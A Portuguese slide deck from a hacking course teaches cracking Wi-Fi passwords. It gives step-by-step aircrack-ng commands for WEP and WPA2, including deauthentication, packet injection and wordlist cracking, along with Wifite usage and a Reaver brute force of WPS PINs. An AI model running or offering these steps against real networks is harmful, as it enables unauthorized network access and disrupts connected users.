0% acharam este documento útil (0 voto)
33 visualizações21 páginas

Quebra de Senhas Wi-Fi: Métodos e Ferramentas

O documento apresenta um guia sobre ataques a redes wireless, incluindo ferramentas como Wifite e Aircrack para quebrar senhas WEP e WPA2. Ele descreve o material necessário e os passos para realizar ataques, além de discutir as vulnerabilidades do WPS. O conteúdo é voltado para usuários que desejam aprender sobre segurança em redes sem fio.

Enviado por

Magno8D
Direitos autorais
© All Rights Reserved
Levamos muito a sério os direitos de conteúdo. Se você suspeita que este conteúdo é seu, reivindique-o aqui.
Formatos disponíveis
Baixe no formato PDF, TXT ou leia on-line no Scribd
0% acharam este documento útil (0 voto)
33 visualizações21 páginas

Quebra de Senhas Wi-Fi: Métodos e Ferramentas

O documento apresenta um guia sobre ataques a redes wireless, incluindo ferramentas como Wifite e Aircrack para quebrar senhas WEP e WPA2. Ele descreve o material necessário e os passos para realizar ataques, além de discutir as vulnerabilidades do WPS. O conteúdo é voltado para usuários que desejam aprender sobre segurança em redes sem fio.

Enviado por

Magno8D
Direitos autorais
© All Rights Reserved
Levamos muito a sério os direitos de conteúdo. Se você suspeita que este conteúdo é seu, reivindique-o aqui.
Formatos disponíveis
Baixe no formato PDF, TXT ou leia on-line no Scribd

O que temos para hoje?

[Link]

Menu do dia:

 Redes Wireless
 Ataques: Material necessário
 Ferramentas mais utilizadas
 Wifite: Script automatizado
 Wifite: Quebrando senhas com Script
 Aircrack: Quebrando WEP em minutos
 Aircrack: Quebrando WPA2
 Conhecendo a tecnologia WPS
 WPS e suas falhas
 Quebrando WPS
Redes Wireless
[Link]
Ataques: Material necessário
[Link]

Material necessário
1 Máquina com o Kali Linux (Física ou Virtual)
1 Adaptador Wifi USB
Ferramentas mais utilizadas
[Link]

Existem dezenas de ferramentas com capacidade para quebrar Senhas Wireless,


porém, mencionamos as mais conhecidas abaixo:

Ferramentas para Ataques Wifi


Wifite – Linux
Aircrack – Windows, Android e Linux
coWPAty – Linux
Wifite: Script automatizado
[Link]

Colocando em prática - Wifite


# Baixando WIFITE
wget -O [Link] [Link]
# Setando Permissões
chmod +x [Link]
# Verificando opções
./[Link] –help
# Carregando Wifite
./[Link]
Pressione CTRL+C quando encontrar a rede desejada.

Caso necessite de um ataque usando dicionário


./[Link] -all --dict /pentest/passwords/wordlists/[Link]

Craquear todos os WEPs acima de 50dB, gastando 15 minutos para captura de


pacotes e transmitindo 600 pacotes por segundo.
./[Link] --power 50 -wepw 15 -pps 600
Wifite: Script automatizado
[Link]

Sucess!
Conhecendo Aircrack
[Link]

Aircrack
Quebrando WEP
[Link]

Quebrando WEP
Quebrando WEP em minutos
[Link]

# Ativa o modo de monitoramento da placa de rede


airmon-ng start wlan0
# Coleta informações sobre as redes Wifis disponíveis
airodump-ng mon0
# Gera um arquivo chamado captura para armazenar os dados obtidos.
airodump-ng -w captura --bssid 00:23:CD:F7:F1:56 -c 6 mon0
-w = gera um arquivo
--bssid = ID do AccessPoint Alvo
-c = Canal
mon0 = dispositivo de captura
Quebrando WEP em minutos
[Link]

Em outro terminal....

# Enviar um pedido de falsa autenticação com um mac associado ao access point


que queremos quebrar a senha
aireplay-ng -1 0 –e blackhat -a 00:23:CD:F7:F1:56 -h 70:F1:A1:DB:62:C8 mon0

--d-1 = Essa opção enviao ao nosso alvo uma autenticação falsa;


0 = Aqui temos o tempo para reassociação, em segundos
-e = ESSID do alvo, ou seja, o nome do access point
-a = Mac-Address do Access Point alvo
-h = Mac-Address de alguém que esteja conectado (associado) ao access Point
mon0 = interface de rede em modo promiscuo.
Quebrando WEP em minutos
[Link]

Em outro terminal....

# Acelerando o Processo!!! Enviando Arp request para a rede


aireplay-ng -3 -b 00:23:CD:F7:F1:56 -h 70:F1:A1:DB:62:C8 mon0

-3 = Opção para arp request;


-b = Mac-Address do Access Point alvo
-h = Mac-Address associado ao access Point, no nosso caso o mac que
identificamos como conectado ao AP rede-segura
mon0 = interface de rede em modo promiscuo.
Quebrando WEP em minutos
[Link]

Depois de coletar mais de 10 mil IVS....


# Quebrar o WEP com o arquivo que criamos
aircrack [Link]
Quebrando WPA2
[Link]

Quebrando WPA2
Quebrando WPA2
[Link]

# Ativa o modo de monitoramento da placa de rede


airmon-ng start wlan0
# Coleta informações sobre as redes Wifis disponíveis
airodump-ng mon0
# Gera um arquivo chamado captura para armazenar os dados obtidos.
airodump-ng -w captura-WPA2 --bssid 00:23:CD:F7:F1:56 -c 6 mon0
-w = gera um arquivo
--bssid = ID do AccessPoint Alvo
-c = Canal
mon0 = dispositivo de captura
Quebrando WPA2
[Link]

Em outro terminal....

# Enviar um pedido de falsa autenticação com um mac associado ao acces point que
queremos quebrar a senha
aireplay-ng --deauth 1 -a 00:23:CD:F7:F1:56 -c 70:F1:A1:DB:62:C8 mon0

--deauth = count : deauthenticate 1 ou todas estações (-0)


-a = Mac-Address do Access Point alvo
-c = Mac-Address de alguém que esteja conectado (associado) ao access Point
mon0 = interface de rede em modo promiscuo.
Quebrando WPA2
[Link]

Depois de coletar mais de alguns IVS....


# Quebrar o WPA2 com o arquivo que criamos
aircrack [Link] –w /tmp/wordlist
Tecnologia WPS
[Link]

Quebrando WPS
Entendendo WPS
[Link]

O WPS permite a configuração facilitada da rede sem fio: basta apertar um botão no
roteador ou digitar uma senha numérica (PIN) de até oito dígitos.

Existem dois problemas.

1. O primeiro é que quando um computador tenta utilizar um código PIN errado, o


roteador da conexão sem fio envia uma resposta conhecida como “EAP-NACK”. A
partir dessa resposta, é possível saber se os primeiros quatro dígitos, dos oito,
estão corretos. Dos quatro dígitos finais, um deles é um dígito verificador, que
pode ser calculado, restando apenas três para serem adivinhados.
Apenas 11 mil tentativas são necessárias para descobrir o código.

2. O segundo problema é que os roteadores não limitam o número de tentativas


erradas de um código PIN. Por esse motivo, um atacante pode ficar tentando
códigos até acertar.
Quebrando WPS
[Link]

# Criar modo monitoramento


airmon-ng start wlan0

# Varrer as redes em busca de WPS


airodump-ng mon0

# Executar Reaver para efetuar brute force no AP


reaver –i mon0 –b BSSID –v

Obs.: Este processo deve levar até 10h


Chega por hoje
[Link]

[Link]

E-mail: [Link]@[Link]

Twitter: @esecuritybr e @desafiohacker

Skype: desafiohacker

Fanpage: [Link]/academiahacker

Você também pode gostar